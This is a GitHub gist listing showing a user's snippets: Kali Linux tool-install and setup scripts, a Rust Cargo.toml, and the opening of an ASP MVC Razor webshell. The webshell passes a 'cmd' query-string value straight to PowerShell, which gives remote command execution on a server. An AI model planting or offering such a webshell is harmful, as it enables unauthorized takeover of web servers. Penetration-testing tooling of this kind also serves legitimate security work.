Skip to content

Instantly share code, notes, and snippets.

@seska451
seska451 / kali-plus-install.sh
Last active October 30, 2025 11:47
Just a quick tools installer to augment kali to have other tools that I like to use. Configures neovim to use lazy plugin manager and adds the dracula theme.
#!/bin/bash
set -e
sudo apt update
sudo apt install -y python3 python3-pip python3-venv
sudo apt install -y openvpn ranger neovim python3-neovim seclists curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmp sslscan sipvicious tnscmd10g whatweb
python3 -m pipx ensurepath
[ -f ~/.zshrc ] && source ~/.zshrc
[ -f ~/.bashrc ] && source ~/.bashrc
@seska451
seska451 / kali-setup.sh
Last active August 15, 2024 14:51
simple kali setup script
#!/bin/bash
read "Please make sure you read and understand this script before you run it. Proceed? (y/n)" answer
if [[ $answer == [Yy] ]]; then
# Update the System
echo "Updating system..."
sudo apt update && sudo apt upgrade -y
# Enable the Firewall (UFW)
echo "Installing and enabling UFW..."
@seska451
seska451 / cargo.toml
Last active September 16, 2020 11:49
Boilerplate commandline application with subcommand parsing courtesy of clap
[package]
name = "my_app"
version = "0.1.0"
authors = ["seska451"]
edition = "2018"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
clap = "3.0.0-beta.1"
@seska451
seska451 / template.cshtml
Last active April 4, 2020 12:30
Basic ASP MVC Razor webshell with powershell
@using System.Diagnostics;
@using System.IO;
@{
var cmd = Request.QueryString["cmd"];
var output = "";
if(string.IsNullOrWhiteSpace(cmd) == false) {
output = powershell(cmd);
}